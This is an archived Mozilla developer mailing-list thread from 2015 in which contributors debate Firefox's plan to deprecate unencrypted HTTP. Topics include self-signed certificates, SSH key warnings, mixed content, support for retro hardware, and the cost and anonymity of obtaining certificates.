On 4/14/15 10:38 AM, Eric Shepherd wrote: > Richard Barnes wrote: >> As the owner of a Mac SE/30 with an 100MB Ethernet card, I >> sympathize. However, consider it part of the challenge! :) There >> are definitely TLS stacks that work on some pretty small devices. > That's a lot faster machine than the ones I play with. My fastest retro > machine is an 8-bit unit with a 10 MHz processor and 4 MB of memory, > with a 10 Mbps ethernet card. And the ethernet is underutilized because > the bus speed of the computer is too slow to come anywhere close to > saturating the bandwidth available. :) Candidly, and not because I still run such a site, I've always found Gopher to be a better fit for resource-constrained computing. The Commodore 128 sitting next to me does very well for that because the protocol and menu parsing conventions are incredibly trivial. What is your 10MHz 8-bit system? Cameron Kaiser gopher://gopher.floodgap.com/
![]() |
0 |
![]() |
On 4/14/15 16:32, northrupthebandgeek@gmail.com wrote: > *By logical measure*, the [connection] that is encrypted but unauthenticated is more secure than the one that is neither encrypted nor authenticated, and the fact that virtually every HTTPS-supporting browser assumes the precise opposite is mind-boggling. That depends on what kind of resource you're trying to access. If the resource you're trying to reach (in both circumstances) isn't demanding security -- i.e., it is an "http" URL -- then your logic is sound. That's the basis for enabling OE. The problem here is that you're comparing: * Unsecured connections working as designed with * Supposedly secured connections that have a detected security flaw An "https" URL is a promise of encryption _and_ authentication; and when those promises are violated, it's a sign that something has gone wrong in a way that likely has stark security implications. Resources loaded via an "http" URL make no such promises, so the situation isn't even remotely comparable. -- Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 0800 x863
![]() |
0 |
![]() |
On Tuesday, April 14, 2015 at 5:39:24 AM UTC-7, Gervase Markham wrote: > On 14/04/15 01:57, northrupt...@gmail.com wrote: > > * Less scary warnings about self-signed certificates (i.e. treat > > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do > > with HTTPS+selfsigned now); the fact that self-signed HTTPS is > > treated as less secure than HTTP is - to put this as politely and > > gently as possible - a pile of bovine manure=20 >=20 > http://gerv.net/security/self-signed-certs/ , section 3. That whole article is just additional shovelfuls of bovine manure slopped o= nto the existing heap. The article assumes that when folks connect to something via SSH and someth= ing changes - causing MITM-attack warnings and a refusal to connect - folks= default to just removing the existing entry in ~/.ssh/known_hosts without = actually questioning anything. This conveniently ignores the fact that - w= hen people do this - it's because they already know there's been a change (= usually due to a server replacement); most folks (that I've encountered at = least) *will* stop and think before editing their known_hosts if it's an un= expected change. "The first important thing to note about this model is that key changes are= an expected part of life." Only if they've been communicated first. In the vast majority of SSH deplo= yments, a host key will exist at least as long as the host does (if not lon= ger). If one is going to criticize SSH's model, one should, you know, actu= ally freaking understand it first. "You can't provide [Joe Public] with a string of hex characters and expect = it to read it over the phone to his bank." Sure you can. Joe Public *already* has to do this with social security num= bers, credit card numbers, checking/savings account numbers, etc. on a pret= ty routine basis, whether it's over the phone, over the Internet, by mail, = in person, or what have you. What makes an SSH fingerprint any different? = The fact that now you have the letters A through F to read? Please. "Everyone can [install a custom root certificate] manually or the IT depart= ment can use the Client Customizability Kit (CCK) to make a custom Firefox.= " I've used the CCK in the past for Firefox customizations in enterprise sett= ings. It's a royal pain in the ass, and is not nearly as viable a solution= as the article suggests (and the alternate suggestion of "oh just use the = broken, arbitrarily-trusted CA system for your internal certs!" is a hilari= ous joke at best; the author of the article would do better as a comedian t= han as a serious authority when it comes to security best practices). A better solution might be to do this on a client workstation level, but it= 's still a pain and usually not worth the trouble for smaller enterprises v= .. just sticking to the self-signed cert. The article, meanwhile, also assumes (in the section before the one you've = cited) that the CA system is immune to being compromised while DNS is vulne= rable. Anyone with a number of brain cells greater than or equal to one sh= ould know better than to take that assumption at face value. >=20 > But also, Firefox is implementing opportunistic encryption, which AIUI > gives you a lot of what you want here. >=20 > Gerv Then that needs to happen first. Otherwise, this whole discussion is moot,= since absolutely nobody in their right mind would want to be shoehorned in= to our current broken CA system without at least *some* alternative.
![]() |
0 |
![]() |
On Tue, Apr 14, 2015 at 5:59 PM, <northrupthebandgeek@gmail.com> wrote: > On Tuesday, April 14, 2015 at 5:39:24 AM UTC-7, Gervase Markham wrote: > > On 14/04/15 01:57, northrupt...@gmail.com wrote: > > > * Less scary warnings about self-signed certificates (i.e. treat > > > HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do > > > with HTTPS+selfsigned now); the fact that self-signed HTTPS is > > > treated as less secure than HTTP is - to put this as politely and > > > gently as possible - a pile of bovine manure > > > > http://gerv.net/security/self-signed-certs/ , section 3. > > That whole article is just additional shovelfuls of bovine manure slopped > onto the existing heap. > > The article assumes that when folks connect to something via SSH and > something changes - causing MITM-attack warnings and a refusal to connect - > folks default to just removing the existing entry in ~/.ssh/known_hosts > without actually questioning anything. This conveniently ignores the fact > that - when people do this - it's because they already know there's been a > change (usually due to a server replacement); most folks (that I've > encountered at least) *will* stop and think before editing their > known_hosts if it's an unexpected change. > > "The first important thing to note about this model is that key changes > are an expected part of life." > > Only if they've been communicated first. In the vast majority of SSH > deployments, a host key will exist at least as long as the host does (if > not longer). If one is going to criticize SSH's model, one should, you > know, actually freaking understand it first. > > "You can't provide [Joe Public] with a string of hex characters and expect > it to read it over the phone to his bank." > > Sure you can. Joe Public *already* has to do this with social security > numbers, credit card numbers, checking/savings account numbers, etc. on a > pretty routine basis, whether it's over the phone, over the Internet, by > mail, in person, or what have you. What makes an SSH fingerprint any > different? The fact that now you have the letters A through F to read? > Please. > > "Everyone can [install a custom root certificate] manually or the IT > department can use the Client Customizability Kit (CCK) to make a custom > Firefox. " > > I've used the CCK in the past for Firefox customizations in enterprise > settings. It's a royal pain in the ass, and is not nearly as viable a > solution as the article suggests (and the alternate suggestion of "oh just > use the broken, arbitrarily-trusted CA system for your internal certs!" is > a hilarious joke at best; the author of the article would do better as a > comedian than as a serious authority when it comes to security best > practices). > > A better solution might be to do this on a client workstation level, but > it's still a pain and usually not worth the trouble for smaller enterprises > v. just sticking to the self-signed cert. > > The article, meanwhile, also assumes (in the section before the one you've > cited) that the CA system is immune to being compromised while DNS is > vulnerable. Anyone with a number of brain cells greater than or equal to > one should know better than to take that assumption at face value. > > > > > But also, Firefox is implementing opportunistic encryption, which AIUI > > gives you a lot of what you want here. > > > > Gerv > > Then that needs to happen first. Otherwise, this whole discussion is > moot, since absolutely nobody in their right mind would want to be > shoehorned into our current broken CA system without at least *some* > alternative. > OE shipped in Firefox 37. It's currently turned off pending a bugfix, but it will be back soon. --Richard > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
On 4/14/2015 4:59 PM, northrupthebandgeek@gmail.com wrote: > The article assumes that when folks connect to something via SSH and > something changes - causing MITM-attack warnings and a refusal to > connect - folks default to just removing the existing entry in > ~/.ssh/known_hosts without actually questioning anything. This > conveniently ignores the fact that - when people do this - it's > because they already know there's been a change (usually due to a > server replacement); most folks (that I've encountered at least) > *will* stop and think before editing their known_hosts if it's an > unexpected change. I've had an offending key at least 5 times. Only once did I seriously think to consider what specifically had changed to cause the ssh key to change. The other times, I assumed there was a good reason and deleted it. This illustrates a very, very, very important fact about UX: the more often people see a dialog, the more routine it becomes to deal with it--you stop considering whether or not it applies, because it's always applied and it's just yet another step you have to go through to do it. -- Joshua Cranmer Thunderbird and DXR developer Source code archæologist
![]() |
0 |
![]() |
On Tuesday, April 14, 2015 at 2:51:32 PM UTC-7, Cameron Kaiser wrote: > Candidly, and not because I still run such a site, I've always found > Gopher to be a better fit for resource-constrained computing. The > Commodore 128 sitting next to me does very well for that because the > protocol and menu parsing conventions are incredibly trivial. Certainly true on a "how well can it keep up?" level, but unfortunately precious few sites support Gopher these days, so while it may be a better fit it offers vastly more constricted access to online resources.
![]() |
0 |
![]() |
On 4/14/15 3:47 PM, commodorejohn@gmail.com wrote: > On Tuesday, April 14, 2015 at 2:51:32 PM UTC-7, Cameron Kaiser wrote: >> Candidly, and not because I still run such a site, I've always found >> Gopher to be a better fit for resource-constrained computing. The >> Commodore 128 sitting next to me does very well for that because the >> protocol and menu parsing conventions are incredibly trivial. > > Certainly true on a "how well can it keep up?" level, but unfortunately > precious few sites support Gopher these days, so while it may be a better > fit it offers vastly more constricted access to online resources. The counter argument is, of course, that the "modern Web" (however you define it) is effectively out of reach of computers older than a decade or so, let alone an 8-bit system, due to loss of vendor or browser support, or just plain not being up to the task. So even if they could access the pages, meaningfully displaying them is another thing entirely. I won't dispute the much smaller amount of content available in Gopherspace, but it's still an option that has *some* support, and that support is often in the retrocomputing community already. Graceful degradation went out the window a couple years back, unfortunately. Anyway, I'm derailing the topic, so I'll put a sock in it now. Cameron Kaiser
![]() |
0 |
![]() |
On 14/04/15 13:32, Eric Shepherd wrote: > My main concern with the notion of phasing out unsecured HTTP is that > doing so will cripple or eliminate Internet access by older devices that > aren't generally capable of handling encryption and decryption on such a > massive scale in real time. > > While it may sound silly, those of us who are intro classic computers > and making them do fun new things use HTTP to connect 10 MHz (or even 1 > MHz) machines to the Internet. These machines can't handle the demands > of SSL. So this is a step toward making their Internet connections go away. If this is important to you, then you could simply run them through a proxy. That's what jwz did when he wanted to get Netscape 1.0 running again: http://www.jwz.org/blog/2008/03/happy-run-some-old-web-browsers-day/ Gerv
![]() |
0 |
![]() |
On 14/04/15 22:59, northrupthebandgeek@gmail.com wrote: > The article assumes that when folks connect to something via SSH and > something changes - causing MITM-attack warnings and a refusal to > connect - folks default to just removing the existing entry in > ~/.ssh/known_hosts without actually questioning anything. https://www.usenix.org/system/files/login/articles/105484-Gutmann.pdf > "The first important thing to note about this model is that key > changes are an expected part of life." > > Only if they've been communicated first. How does a website communicate with all its users that it is expecting to have (or has already had) a key change? After all, you can't exactly put a notice on the site itself... > "You can't provide [Joe Public] with a string of hex characters and > expect it to read it over the phone to his bank." > > Sure you can. Joe Public *already* has to do this with social > security numbers, credit card numbers, checking/savings account > numbers, etc. on a pretty routine basis, whether it's over the phone, > over the Internet, by mail, in person, or what have you. What makes > an SSH fingerprint any different? The fact that now you have the > letters A through F to read? Please. You have missed the question of motivation. I put up with reading a CC number over the phone (begrudgingly) because I know I need to do that in order to buy something. If I have a choice of clicking "OK" or phoning my bank, waiting in a queue, and eventually saying "Hi. I need to verify the key of your webserver's cert so I can log on to do my online banking. Is it 09F9.....?" then I'm just going to click "OK" (or "Whatever", as that button should be labelled). Gerv
![]() |
0 |
![]() |
On 14/04/15 17:46, jww@chromium.org wrote: > I just wanted to mention that regarding subresource integrity > (https://w3c.github.io/webappsec/specs/subresourceintegrity/), the > general consensus over here is that we will not treat origins as > secure if they are over HTTP but loaded with integrity. We believe > that security includes confidentiality, which that would approach > would lack. --Joel Radical idea: currently, the web has two states, insecure and secure. What if it still had two states, with the same UI, but insecure meant "HTTPS top-level, but some resources may be loaded using HTTP with integrity", and secure meant "HTTPS throughout"? That is to say, we don't have to tie the availability of new features to the same criteria as we tie the HTTP vs. HTTPS icon/UI in the browser. We could allow powerful features for HTTPS-top-level-and-some-HTTP-with-integrity, while still displaying it as insecure. Gerv
![]() |
0 |
![]() |
On Wed, Apr 15, 2015 at 11:50 AM, Gervase Markham <gerv@mozilla.org> wrote: > Radical idea: currently, the web has two states, insecure and secure. > What if it still had two states, with the same UI, but insecure meant > "HTTPS top-level, but some resources may be loaded using HTTP with > integrity", and secure meant "HTTPS throughout"? HTTPS already has mixed content, we should not make it worse. -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On 15/04/15 10:59, Anne van Kesteren wrote: > HTTPS already has mixed content, we should not make it worse. What's actually wrong with mixed content? 1) The risk of content tampering. Subresource integrity makes that risk go away. 2) Reduced privacy. And that's why the connection would be marked as insecure in the UI. Gerv
![]() |
0 |
![]() |
On Wed, Apr 15, 2015 at 12:10 PM, Gervase Markham <gerv@mozilla.org> wrote: > 2) Reduced privacy. And that's why the connection would be marked as > insecure in the UI. We need to move away from HTTPS being able to go into an insecure state. We can't expect the user to keep an eye on the address bar the whole time. -- https://annevankesteren.nl/
![]() |
0 |
![]() |
If you're addicted to cleartrext, the future is going to be hard for you... On Tue, Apr 14, 2015 at 2:26 PM, <connor.behan@gmail.com> wrote: > HTTPS has its moments, but the majority of the web does not need it. I ce= rtainly wouldn't appreciate the encryption overhead just for visiting David= 's lolcats website. As one of the most important organizations related to f= ree software, it's sad to see Mozilla developers join the war on plaintext:= http://arc.pasp.de/ The owners of websites like this have a right to serve= their pages in formats that do not make hypocrites of themselves. > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform --=20 Joseph Lorenzo Hall Chief Technologist Center for Democracy & Technology 1634 I ST NW STE 1100 Washington DC 20006-4011 (p) 202-407-8825 (f) 202-637-0968 joe@cdt.org PGP: https://josephhall.org/gpg-key fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
![]() |
0 |
![]() |
On Wednesday, April 15, 2015 at 6:56:48 AM UTC-7, Joseph Lorenzo Hall wrote: > If you're addicted to cleartrext, the future is going to be hard for you... Only because people like you insist on trying to push it across-the-board, rather than let webmasters make their own decisions.
![]() |
0 |
![]() |
On Wed, Apr 15, 2015 at 10:03 AM, <commodorejohn@gmail.com> wrote: > rather than let webmasters make their own decisions. I firmly disagree with your conclusion, but I think you have identified the central property that is changing. Traditionally transport security has been a unilateral decision of the content provider. Consumers could take it or leave it as content providers tried to guess what content was sensitive and what was not. They could never really know, of course. The contents of a public library are not private - but my reading history may or may not be. An indexed open source repository is not private - but my searching for symbols involved in a security bug may be. The content provider can't know apriori and even if they do may not share the interests of the consumer. The decision is being made by the wrong party. The HTTPS web says that data consumers have the right to (at least transport) confidentiality and data integrity all of the time, regardless of the content. It is the act of consumption that needs to be protected as we go through our day to day Internet lives. HTTPS is certainly not perfect at doing this, but its the best thing we've got. So yes, this is a consumer-first, rather than provider-first, policy. -Patrick
![]() |
0 |
![]() |
On 2015-04-15 10:03 AM, commodorejohn@gmail.com wrote: > On Wednesday, April 15, 2015 at 6:56:48 AM UTC-7, Joseph Lorenzo Hall wrote: >> If you're addicted to cleartrext, the future is going to be hard for you... > Only because people like you insist on trying to push it across-the-board, rather than let webmasters make their own decisions. Webmasters are already restricted in how they can run their services in many ways, some standards-based, some inherent to the web as we find it in the wild. For what it's worth I think that the fact that it is (at present) way more difficult to obtain, install, and update a certificate for a web server than it is to obtain, install and update a web server means that _mandating_ HTTPS would represent a real barrier to participation in a free and open Web. Having said that, "deprecated" clearly doesn't mean "prohibited", and the Let's Encrypt's "How It Works" page suggests that setting up a cert won't be all that difficult in the near future. So, while you may be right that the benefits here seem to be all client side and the up-front costs seem to be all server-side, it looks like work is well underway to reduce server-side costs to almost nothing. Moving from "TLS if the server wants to" to "TLS is what the client expects" is a meaningful change in incentive structure underneath web security, and sounds like the right thing to me. - mhoye * https://letsencrypt.org/howitworks/
![]() |
0 |
![]() |
Boris Zbarsky schrieb: > On 4/14/15 3:28 AM, Anne van Kesteren wrote: >> On Tue, Apr 14, 2015 at 4:10 AM, Karl Dubost <kdubost@mozilla.com> wrote: >>> 1. You do not need to register a domain name to have a Web site (IP >>> address) >> >> Name one site you visit regularly that doesn't have a domain name. > > My router's configuration UI. Here "regularly" is probably once a month > or so. > >> And even then, you can get certificates for public IP addresses. > > It's not a public IP address. > > We do need a solution for this space, which I expect includes the > various embedded devices people are bringing up; I expect those are > behind firewalls more often than on the publicly routable internet. Definitely. Right now, esp. those router configs and similar web interfaces to devices are in a very bad state - either they run unencrypted (most of them) or they can only go with self-signed certs with mostly-bogus domain descriptors, which is pretty bad as well, or the user needs to create a cert and install it into the device, which is too much hassle for the vast majority of people. Are there any good proposals on how to make those decently secure and keep them easy to use? KaiRo
![]() |
0 |
![]() |
northrupthebandgeek@gmail.com schrieb: > On Monday, April 13, 2015 at 8:26:59 PM UTC-7, ipar...@gmail.com wrote: >>> * Less scary warnings about self-signed certificates (i.e. treat HTTPS+selfsigned like we do with HTTP now, and treat HTTP like we do with HTTPS+selfsigned now); the fact that self-signed HTTPS is treated as less secure than HTTP is - to put this as politely and gently as possible - a pile of bovine manure >> >> I am against this. Both are insecure and should be treated as such. How is your browser supposed to know that gmail.com is intended to serve a self-signed cert? It's not, and it cannot possibly know it in the general case. Thus it must be treated as insecure. > > Except that one is encrypted, and the other is not. *By logical measure*, the one that is encrypted but unauthenticated is more secure than the one that is neither encrypted nor authenticated, and the fact that virtually every HTTPS-supporting browser assumes the precise opposite is mind-boggling. Right, the transport is encrypted, but it's completely unverified that you are accessing the actual machine you wanted to reach (i.e. there is no domain verification, which is what you need a 3rd-party system for, the CA system being the usual one in the TLS/web realm). You could just as much be connected to a MitM with that encrypted transport. KaiRo
![]() |
0 |
![]() |
northrupthebandgeek@gmail.com schrieb: > That whole article is just additional shovelfuls of bovine manure slopped onto the existing heap. Please refrain from language like that in lists like this if you want to be taken seriously. KaiRo
![]() |
0 |
![]() |
vic schrieb: > I would view this proposal favorably if 1) you didn't try to force people to adopt the One True Way and 2) the CA situation was fixed. Please define of what alternatives to what you call the "One True Way" are acceptable to you and still secure to access, and also what specific issues with the CA system you would want/need to see fixed. It's hard to discuss improvements when you are low on specifics. KaiRo
![]() |
0 |
![]() |
Yoav Weiss schrieb: > IMO, limiting new features to HTTPS only, when there's no real security > reason behind it will only end up limiting feature adoption. > It directly "punishing" developers and adds friction to using new features, > but only influence business in a very indirect manner. That's my concern as well, I think we need to think very hard about what reasons people have to still not use TLS and how we can help them to do so. Let's Encrypt will be one step easing the solution to one class of reasons, but there's more. KaiRo
![]() |
0 |
![]() |
On Wed, Apr 15, 2015 at 5:20 PM, Robert Kaiser <kairo@kairo.at> wrote: > Are there any good proposals on how to make those decently secure and keep > them easy to use? I believe Chrome is experimenting with different UI for self-signed certificates when connecting to a local server. A good outline of the problem space is here: https://noncombatant.org/2014/10/12/brainstorming-security-for-the-internet-of-things/ -- https://annevankesteren.nl/
![]() |
0 |
![]() |
On Wed, Apr 15, 2015 at 10:44:35AM +0100, Gervase Markham wrote: > On 14/04/15 22:59, northrupthebandgeek@gmail.com wrote: > > The article assumes that when folks connect to something via SSH and > > something changes - causing MITM-attack warnings and a refusal to > > connect - folks default to just removing the existing entry in > > ~/.ssh/known_hosts without actually questioning anything. > > https://www.usenix.org/system/files/login/articles/105484-Gutmann.pdf That is somewhat discouraging, but I wonder what the conditions of these organizations are. At the very risky end you could ignore a key change you were not told of ahead of time for <my chinese hosting provider>. On the other hand if I'm sitting at my desk using my laptop and change the key for the sshd on my desktop there isn't nearly as much risk in ignoring the key my laptop sees. > > "The first important thing to note about this model is that key > > changes are an expected part of life." > > > > Only if they've been communicated first. > > How does a website communicate with all its users that it is expecting > to have (or has already had) a key change? After all, you can't exactly > put a notice on the site itself... Well, you can put up a notice while using the old cert, and in principal you can sign the new cert with the old one similar to what you do when changing gpg keys. However in the case the old cert needs to be revoked all users do need to go back to the out of band verification method. > > "You can't provide [Joe Public] with a string of hex characters and > > expect it to read it over the phone to his bank." > > > > Sure you can. Joe Public *already* has to do this with social > > security numbers, credit card numbers, checking/savings account > > numbers, etc. on a pretty routine basis, whether it's over the phone, > > over the Internet, by mail, in person, or what have you. What makes > > an SSH fingerprint any different? The fact that now you have the > > letters A through F to read? Please. > > You have missed the question of motivation. I put up with reading a CC > number over the phone (begrudgingly) because I know I need to do that in > order to buy something. If I have a choice of clicking "OK" or phoning > my bank, waiting in a queue, and eventually saying "Hi. I need to verify > the key of your webserver's cert so I can log on to do my online > banking. Is it 09F9.....?" then I'm just going to click "OK" (or > "Whatever", as that button should be labelled). I wonder if there's a reasonable way to make it hard to click "whatever", but fairly easy to say "I expect the finger print for the cert for foo.com is ab:cd:de:fg..." if that's correct I'm happy this is secure. As an asside I personally find the manual comparison to be a pain even if I have both finger prints easily available. Trev > > Gerv > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform
![]() |
0 |
![]() |
As Robert is saying: Le 16 avr. 2015 =C3=A0 00:29, Robert Kaiser <kairo@kairo.at> a =C3=A9crit = : > I think we need to think very hard about what reasons people have to = still not use TLS and how we can help them to do so. Definitely. The resistance in this thread is NOT about "people against security", = but=20 1. we want to be able to choose 2. if we choose safe, we want that choice to be easy to activate. # Drifting Socially, eavesdropping is part of our daily life. We go to a caf=C3=A9, = we are having a discussion and people around you may listen what you are = saying. You read a book in the train, a newspaper and people might see = what you are reading.=20 We adjust the type of discussions depending on the context. The caf=C3=A9 = is too "dangerous", too "privacy invasive" and we decide to go to a = safer environment, sometimes a safer environment is not necessary being = hidden (encryption), but being more public. As I said contexts. (Note above my usage of the word safe and not secure) # Back to the topic It's important for the user to understand the weaknesses and the = strength of the environment so they can make a choice. You could almost = imagine that you do not care to be plain text until a moment where you = activate a secure mode. (change of place in the cafe) Also we need to think in terms of P2P communications, not only = broadcaster-consumers (1-to-many). If the Web becomes something which is = harder and harder to start hacking on and communicating with your peers, = then we reinforce the power of big hierarchical structures and we change = the balance that Web brought over the publishing/media industry. We = should always strive for bringing the tools that empower individual = people with their ideas and expressions. Security is part of it. But security doesn't necessary equate to safer. = It's just a tool that can be used in some circumstances. Do we want to deprecate HTTP? Or do we want to make it more obvious when = the connection is not secure? These are two very different things. --=20 Karl Dubost, Mozilla http://www.la-grange.net/karl/moz
![]() |
0 |
![]() |
On 16/04/15 02:13, Karl Dubost wrote: > Definitely. The resistance in this thread is NOT about "people > against security", but 1. we want to be able to choose 2. if we > choose safe, we want that choice to be easy to activate. I'd have it the other way. If you even assume choice should be possible then: 1) We want to be able to choose 2) If we choose unsafe, we want that choice to be relatively hard to activate. In other words, "safe" should be the default. Gerv
![]() |
0 |
![]() |
I expressed my opinion on this subject at length on the Chrome lists when they made a similar proposal. I'll summarize it here, though, since I feel the same way about FF deprecating non-encrypted HTTP: I think HTTPS-everywhere is a great ideal if we can achieve it, but in the vast majority of discussions it feels like people are underestimating the difficulties involved in deploying HTTPS in production. In particular, I think this puts a significant group of people at risk and they don't necessarily have the ability to advocate for themselves in environments like this. Low-income internet users, teenagers, and people in less-developed nations are more likely to be dependent on inexpensive-or-free services to put content up on the internet. In the best case they might have a server of their own they can configure for HTTPS (given sufficient public documentation & time) but the task of getting a certificate is a huge hurdle. I've acquired personal certificates in the past through the normal paid CA pipeline and the experience was bad enough as someone who lives in Silicon Valley and can afford a certificate. There are some steps being taken to reduce the difficulty here, and I think that's a good start. StartSSL offers free certs, and that's wonderful (aside from the fact that their OCSP servers broke and took down a portion of the web the other day...) and if letsencrypt ships it seems like it could be a comprehensive solution to the problem. If unencrypted HTTP is deprecated it *must* be not only simple for individuals to acquire a certificate, but it shouldn't require them to interact with western governments/business regulations, and it shouldn't require them to compromise anonymity. Anonymity is an important feature of web services and especially important for disadvantaged people. Unencrypted pages mean that visitors are potentially at risk and their sites can be MITMd, but a MITM is at least not going to expose their real name or real identity and put them at risk from attack. Past security breaches at various internet services & businesses suggest that if an individual has to provide identifying information to a CA - even if it is promised to be kept private - they are putting themselves at risk. Letsencrypt seems to avoid this requirement so I look forward to it launching in the near future. I also think there are potential negative consequences to deprecating HTTP if the process of rolling out HTTPS is prohibitively difficult for amateur/independent developers: In practice it may force many of them to move to hosting their content on third-party servers/services that provide HTTPS, which puts them at risk of having their content tampered with or pulled by the service provider. In this scenario I'm not sure we've won anything because we've made the site look secure when in fact we've simplified the task of altering site content without the author or visitor's knowledge. On 16 April 2015 at 01:49, Gervase Markham <gerv@mozilla.org> wrote: > On 16/04/15 02:13, Karl Dubost wrote: >> Definitely. The resistance in this thread is NOT about "people >> against security", but 1. we want to be able to choose 2. if we >> choose safe, we want that choice to be easy to activate. > > I'd have it the other way. If you even assume choice should be possible > then: > > 1) We want to be able to choose > 2) If we choose unsafe, we want that choice to be relatively hard to > activate. > > In other words, "safe" should be the default. > > Gerv > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform
![]() |
0 |
![]() |
On Wed, Apr 15, 2015 at 9:13 PM, Karl Dubost <kdubost@mozilla.com> wrote: > As Robert is saying: > > Le 16 avr. 2015 =C3=A0 00:29, Robert Kaiser <kairo@kairo.at> a =C3=A9crit= : > > I think we need to think very hard about what reasons people have to > still not use TLS and how we can help them to do so. > > Definitely. > The resistance in this thread is NOT about "people against security", but > 1. we want to be able to choose > 2. if we choose safe, we want that choice to be easy to activate. > Please see McManus's argument for why putting all the choice in webmasters' hands is not really the best option for today's web. > # Drifting > > Socially, eavesdropping is part of our daily life. We go to a caf=C3=A9, = we are > having a discussion and people around you may listen what you are saying. > You read a book in the train, a newspaper and people might see what you a= re > reading. > > We adjust the type of discussions depending on the context. The caf=C3=A9= is > too "dangerous", too "privacy invasive" and we decide to go to a safer > environment, sometimes a safer environment is not necessary being hidden > (encryption), but being more public. As I said contexts. > > (Note above my usage of the word safe and not secure) > Of course, in the caf=C3=A9, you can evaluate who has access to your communication -- you can look around and see. When you load a web page, your session traverses, on average, four different entities [1], any of whom can subvert your communications. The user has no visibility in to this path, not least because it often can't be predicted in advance. You're in the UK, talking to a server in Lebanon. Does your path traverse France? Possibly! (Probably!) The idea that the user can evaluate the trustworthiness of every ISP between his computer and a web server seems pretty outlandish. Maybe in some limited development or enterprise environments, but certainly not for the general web. # Back to the topic > > It's important for the user to understand the weaknesses and the strength > of the environment so they can make a choice. You could almost imagine th= at > you do not care to be plain text until a moment where you activate a secu= re > mode. (change of place in the cafe) > > Also we need to think in terms of P2P communications, not only > broadcaster-consumers (1-to-many). If the Web becomes something which is > harder and harder to start hacking on and communicating with your peers, > then we reinforce the power of big hierarchical structures and we change > the balance that Web brought over the publishing/media industry. We shoul= d > always strive for bringing the tools that empower individual people with > their ideas and expressions. > > Security is part of it. But security doesn't necessary equate to safer. > It's just a tool that can be used in some circumstances. > > Do we want to deprecate HTTP? Or do we want to make it more obvious when > the connection is not secure? These are two very different things. > http://i.imgur.com/c7NJRa2.gif --Richard [1] http://bgp.potaroo.net/as6447/ [2] http://www.lemonde.fr/pixels/article/2015/04/16/les-deputes-approuvent-un-s= ysteme-de-surveillance-du-trafic-sur-internet_4616652_4408996.html > > -- > Karl Dubost, Mozilla > http://www.la-grange.net/karl/moz > > _______________________________________________ > dev-platform mailing list > dev-platform@lists.mozilla.org > https://lists.mozilla.org/listinfo/dev-platform >
![]() |
0 |
![]() |
Hey Katelyn, Thanks for bringing up these considerations. On Thu, Apr 16, 2015 at 5:35 AM, Katelyn Gadd <kg@luminance.org> wrote: > I expressed my opinion on this subject at length on the Chrome lists > when they made a similar proposal. I'll summarize it here, though, > since I feel the same way about FF deprecating non-encrypted HTTP: > > I think HTTPS-everywhere is a great ideal if we can achieve it, but in > the vast majority of discussions it feels like people are > underestimating the difficulties involved in deploying HTTPS in > production. In particular, I think this puts a significant group of > people at risk and they don't necessarily have the ability to advocate > for themselves in environments like this. Low-income internet users, > teenagers, and people in less-developed nations are more likely to be > dependent on inexpensive-or-free services to put content up on the > internet. In the best case they might have a server of their own they > can configure for HTTPS (given sufficient public documentation & time) > but the task of getting a certificate is a huge hurdle. I've acquired > personal certificates in the past through the normal paid CA pipeline > and the experience was bad enough as someone who lives in Silicon > Valley and can afford a certificate. > Let me try to disentangle two threads here: 1. "Zero-rated" services [1]. These are services where the carrier agrees not to charge the user for data to access certain web sites. Obviously, these can play an important role for carriers in developing economies especially. HTTPS can have an impact here, since it prevents the carrier from seeing anything beyond the hostname that the user is connecting to. I would observe, however, that (1) most zero-rating is done on a hostname basis anyway, and (2) even if more granularity is desired, there are solutions for this that don't involve DPI, e.g., having the zero-rated site send a ping to the carrier in JS. 2. Requirement for free/inexpensive/hobbyist services to get certificates. Examples of free certificate services have been given several times in this thread. Several hosting platforms already offer HTTPS helper tools. And overall, I think the trend is toward greater usability. So the situation is pretty OK (not great) today, and it's getting better. If we think of this HTTP deprecation plan not as something we're doing today, but something we'll be doing over the next few years, it seems like deprecating HTTP and improved HTTPS deployability can develop together. > There are some steps being taken to reduce the difficulty here, and I > think that's a good start. StartSSL offers free certs, and that's > wonderful (aside from the fact that their OCSP servers broke and took > down a portion of the web the other day...) and if letsencrypt ships > it seems like it could be a comprehensive solution to the problem. If > unencrypted HTTP is deprecated it *must* be not only simple for > individuals to acquire a certificate, but it shouldn't require them to > interact with western governments/business regulations, and it > shouldn't require them to compromise anonymity. Anonymity is an > important feature of web services and especially important for > disadvantaged people. Unencrypted pages mean that visitors are > potentially at risk and their sites can be MITMd, but a MITM is at > least not going to expose their real name or real identity and put > them at risk from attack. Past security breaches at various internet > services & businesses suggest that if an individual has to provide > identifying information to a CA - even if it is promised to be kept > private - they are putting themselves at risk. Letsencrypt seems to > avoid this requirement so I look forward to it launching in the near > future. > I'm not sure what the state of the art with StartCom is, but when I got a certificate from WoSign the other day [2], they didn't require any identification besides an email address. As far as I know, Let's Encrypt will require about the same level of information. There's certainly nothing about the standards or norms for the web PKI that requires CAs to collect identifying information about applicants for certificates. > I also think there are potential negative consequences to deprecating > HTTP if the process of rolling out HTTPS is prohibitively difficult > for amateur/independent developers: In practice it may force many of > them to move to hosting their content on third-party servers/services > that provide HTTPS, which puts them at risk of having their content > tampered with or pulled by the service provider. In this scenario I'm > not sure we've won anything because we've made the site look secure > when in fact we've simplified the task of altering site content > without the author or visitor's knowledge. > Maybe I'm coming from a position of privilege here, but the difficulty of setting up HTTPS seems exaggerated to me. Mozilla already provides an HTTPS config generator [3], and I know Let's Encrypt is already having some conversations with platform vendors about adding more automation to HTTPS config. --Richard [1] http://en.wikipedia.org/wiki/Zero-rating [2] https://buy.wosign.com/free/ [3] https://mozilla.github.io/server-side-tls/ssl-config-generator/ > > On 16 April 2015 at 01:49, Gervase Markham <gerv@mozilla.org> wrote: > > On 16/04/15 02:13, Karl Dubost wrote: > >> 